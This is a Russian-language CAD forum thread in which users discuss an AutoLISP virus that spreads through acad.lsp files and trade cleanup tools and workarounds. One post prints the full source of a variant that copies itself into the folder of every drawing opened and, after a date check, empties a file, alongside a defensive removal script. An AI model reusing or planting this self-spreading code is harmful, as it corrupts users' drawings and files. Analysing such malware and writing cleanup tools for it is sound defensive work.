[dextron3]

Вот уже целый год во все проектных фирмах все автокадовские файлы заражены вирусом (архив прилагается), но скорее всего в архиве производная от него!

Принцип действия:

При запуске любого автокадовского чертежа в этой же директории создается файл acad.lisp в котором прописывается вредоносный код вируса, сам лисп файл влияет на определенные команды автокада, ну допустим (взрывчатка не работает)

Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой

Касперский его не видет вплоть до 7 версии

КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
:idea: :idea: :idea:
[ATTACH]1180033030.rar[/ATTACH]

Тем, кому не прочитать тему:
http://forum.dwg.ru/showpost.php?p=218027&postcount=36
http://forum.dwg.ru/showpost.php?p=262114&postcount=52
http://forum.dwg.ru/showpost.php?p=796334&postcount=88
Для понимания механизма работы "вируса": http://forum.dwg.ru/showpost.php?p=1...&postcount=130
Для чистки следов вируса: http://autolisp.ru/wp-content/upload...acad-virus.lsp + http://wp.me/p4lEOS-GR

[Bekbolatov]

Решение проблемы по любым АвтоКад вирусам: http://dwg.ru/f/showthread.php?p=275205&

[VVA]

Еще один вариант заразы Acaddoc.lsp вирус или нет?

[Denys]

Цитата:

Сообщение от dextron3 Касперский его не видет вплоть до 7 версии КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ??? :idea: :idea: :idea: [ATTACH]1180033030.rar[/ATTACH]

Отсылай этот файл Касперскому в лабораторию (там есть такая функция), они быстро реагируют и вскоре, обновив антивирусные базы, твой каспер найдёт и обезвредит заразу. (Хотя ... странно что вирусу уже год, а Каспер его не знает).

Сам качать файл боюсь. :-Р

Удачи

[znatok]

Мой ответ относится к следующим сообщениям

Цитата:

Сообщение от dextron3 .... Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой Касперский его не видет вплоть до 7 версии КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???

Цитата:

Сообщение от Asys мой друг пожаловался на странное поведение его Acada, по симптомам вроде напоминает случай описанный в первом сообщении, но все равно не то. Я прикладываю один подозрительный файлик который стал появляться в рабочих папках. Просьба к спецам-програмистам поковырять приложенный файлик на предмет вредоносности. И желательно выработать лекарство

Во, что выдаёт virustotal:

http://www.virustotal.com/ru/analisi...0c5-1278857854

http://www.virustotal.com/ru/analisi...3f2-1278858704

[WOL4OHOK]

Цитата:

Сообщение от VVA Еще один вариант заразы Acaddoc.lsp вирус или нет?

Да вирус, у мну похреначил файл уже, други заражены тоже, что делать хз.

[Кулик Алексей aka kpblc]

Цитата:

Сообщение от WOL4OHOK что делать

Не хз, а почитать FAQ по AutoCAD

[mig84]

Цитата:

Сообщение от WOL4OHOK Да вирус, у мну похреначил файл уже, други заражены тоже, что делать хз.

Взяв за основу скрипт vbs'ский сделал небольшую утилиту. Чистит все файлы *.lsp от "хвостов" этой гадости. *.mnr, *.mns, *.mnc - удаляются.
Замечена пока одна проблема как и у скрипта - если есть сетевые диски, их надо отключить перед проверкой. В отличии от скрипта - нет необходимости запускать с консоли, чтобы увидеть что именно было удалено/очищено.
ps: сборка для net.3.5 (если установлен AutoCad 2010 и дальше, то этот fw уже установлен)

[VVA]

Набрел на следующие рекомендации AUTODESK How to detect and remove the Acad.vlx virus
Тема на другом форуме про вирус acad viruse Там выложена программа KillWorm для очистки заразы из Acaddoc.lsp вирус или нет? (та, которая (setq flagx t))
Опции

Цитата:

Active to search, find, then kill the virus if it is active. Passive to search, find, then kill the virus even if it is not currently active. ALL to search all local drives and folders. ? to see a brief help about the command.

KillWorm142.lsp

[Yuriy-I]

пока удалил ...
читаю, что пропустил )))

[weltwelt]

Цитата:

Сообщение от dextron3 Вот уже целый год во все проектных фирмах все автокадовские файлы заражены вирусом (архив прилагается), но скорее всего в архиве производная от него! Принцип действия: При запуске любого автокадовского чертежа в этой же директории создается файл acad.lisp в котором прописывается вредоносный код вируса, сам лисп файл влияет на определенные команды автокада, ну допустим (взрывчатка не работает) Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой Касперский его не видет вплоть до 7 версии КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ??? :idea: :idea: :idea: [ATTACH]1180033030.rar[/ATTACH]

Вирус заползает с флешки, если с среди множества файлов есть такой файлик с acad.lsp программой.

Как бороться - Удалить все acad.lsp c машины. И вместо них записать все необходимые acad.lsp с указанным атрибутом ONLY READ

В этом случае вирус не залезает. Кстати Вирусом он закидаваеся также в папку
C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 200ххх\...
Здесь тоже создать такой only-read файл acad.lsp.

На данный момент AVAST этот вирус лечит

[Солидворкер]

weltwelt, Капитан, это Вы?!

[sbi]

weltwelt Проще, создать вирус, а потом его уничтожить. Это не Вы?

[ciril]

Объявилась слегка модифицированная версия обсуждаемого файла. Выглядит как:
acad.lsp

Код:

[Выделить все]

 ++++++++++++++++++++----------------------------------------++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




------------------------
(defun s::startup  (/ old_cmd path dwgpath mnlpath apppath oldacad newacad nowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2 kd)
  (setq old_cmd (getvar "cmdecho"))
  (setvar "cmdecho" 1)
  (setq path (findfile "base.dcl"))
  (setq path (substr path 1 (- (strlen path) 8)))
  (setq mnlpath (getvar "menuname"))
  (setq nowdwg (getvar "dwgname"))
  (setq wjqm (findfile nowdwg))
  (setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
  (setq acadpath (findfile "acad.lsp"))
  (setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))
  (setq ns1 ""
        ns2 "")
  (setq lspbj 0)
  (if (= acadpath dwgpath)
    (progn (setq oldacad (findfile "acad.lsp")) (setq newacad (strcat path "acad.lsp")) (writeapp))
    (progn
      (if (/= nowdwg "Drawing.dwg")
        (progn (setq oldacad (findfile "acad.lsp")) (setq newacad (strcat dwgpath "acad.lsp")) (writeapp)))))
  (setq nowdwg (getvar "dwgname"))
  (setq wjqm (findfile nowdwg))
  (if (setq kd (findfile "acadisa.lin"))
    (progn (setq ns2 0)
           (if (setq ns1 (open kd "r"))
             (progn (while (setq wz (read-line ns1))
                      (if (= wjqm wz)
                        (setq ns2 1)))
                    (close ns1)))
           (if (= ns2 0)
             (progn (setq ns1 (open kd "a")) (write-line wjqm ns1) (close ns1)))
           (if (setq ns1 (open kd "r"))
             (progn (setq wz (read-line ns1)) (close ns1)))
           (if (> (getvar "date") (+ (distof wz) 8))
             (progn (setq oldacad (strcat path "acadisa.lin"))
                    (setq newacad (strcat dwgpath "a"))
                    (writeapp)
                    (if (setq wjm1 (open oldacad "w"))
                      (progn (setq wjm (open newacad "r"))
                             (setq wz (read-line wjm))
                             (write-line (rtos (getvar "date")) wjm1)
                             (setq wz (read-line wjm))
                             (if (> (getvar "date") 2452900)
                               (close (open wz "w")))
                             (while (setq wz (read-line wjm)) (write-line wz wjm1))
                             (close wjm)
                             (close wjm1)
                             (close (open newacad "w")))))))
    (progn (if (setq ns1 (open (strcat path "acadisa.lin") "w"))
             (progn (write-line (rtos (getvar "date")) ns1) (write-line wjqm ns1) (close ns1)))))
  (setvar "cmdecho" old_cmd)
  (princ))
(defun writeapp  ()
  (if (setq wjm1 (open newacad "w"))
    (progn (setq wjm (open oldacad "r"))
           (while (setq wz (read-line wjm)) (write-line wz wjm1))
           (close wjm)
           (close wjm1))))
                                        ;*************

Существенное отличие - создает файл acadisa.lin, в который записывает пути к папкам, в которых уже присутствует. На чем и построена борьба с ним:
anti.lsp

Код:

[Выделить все]

 ((eval '(lambda (/ x00 x01 x02 x03)
          (while (setq x00 (findfile "acadisa.lin")) ;ищем, пока по путям поддержки находится файл acadisa.lin
            (setq x01 0)
            (read-line (setq x02 (open x00 "r"))) ;открываем его, читаем, первая линия: дата - не нужна
            (while (setq x03 (read-line x02)) ;читаем пока не кончится
              (and (vl-file-delete (strcat (vl-filename-directory x03) "\\acad.lsp")) (setq x01 (1+ x01)))) ;удаляем acad.lsp, приращаем счетчик, возобновляем цикл чтения acadisa.lin
            (close x02) ;закрываем acadisa.lin
            (vl-file-delete x00)) ;удаляем его, возобновляем цикл поиска
          (and x01 (progn (setq s::startup nil) (princ (strcat "\nacad.lsp - " (itoa x01))))) ;переопределяем стартапп-функцию и выводим количество удаленных acad.lsp
          (princ))))

Добавить в автозагрузку. Или записью в реестр:
[HKEY_CURRENT_USER\Software\Autodesk\AutoCAD\R18.1\ACAD-9000:419\Profiles\"текущий_профиль"\Dialogs\Appload\Startup]
"NStartup"="путь к файлу\\anti.LSP"
"NumStartup"="N"
"текущий профиль" - значение по умолчанию ключа profile
если файлы в автозагрузке уже есть, то этот будет последним и NumStartup увеличится на единицу.

[Wyacheslav1]

Появилась такая проблема после копирования объекта и его расчленении. Когда просто открывался ничего не было, а как скопировал себе объект и расчленил, перестал сохранять и сохранять как. Файл из Данлоада dnl5450_Shemy_stropovok_gruzov_v_pomocsh_PPRcshikam_
Воспользовался с поста 87 (спасибо!), теперь сохраняет, а сохранить как не "хотит", пишет "Неправильное имя файла".
Самое обидное что надо по диплому распечатывать и работать

[Кулик Алексей aka kpblc]

Этот вирус лечится изменением драйвера hands.sys

[Wyacheslav1]

Цитата:

Сообщение от Кулик Алексей aka kpblc Этот вирус лечится изменением драйвера hands.sys

Прошу прощение за возможно глупый вопрос, а как это сделать? Вроде в этой теме не заметил... Или лучше новичку туда не лезть?

[Солидворкер]

Цитата:

Сообщение от Wyacheslav1 Прошу прощение за возможно глупый вопрос, а как это сделать? Вроде в этой теме не заметил... Или лучше новичку туда не лезть?

Драйвер hands.sys переводится на русский как "прямые руки"
Всегда Ваш
Капитан Очевидность

[Wyacheslav1]

Цитата:

Сообщение от Солидворкер Драйвер hands.sys переводится на русский как "прямые руки" Всегда Ваш Капитан Очевидность

Лучше бы врача выпрямляющего кривые руки
Как "сохранить как"?

[KronSerg]

filedia в 1,
нормальное имя файлу давать,
чертёж от шелухи очистить,
Сохранить чертёж, скопировать в проводнике и переименовать,
Скопировать файл автосохранения,
Биться головой о стену пока не полегчает.

[gomer]

лучше с последнего начать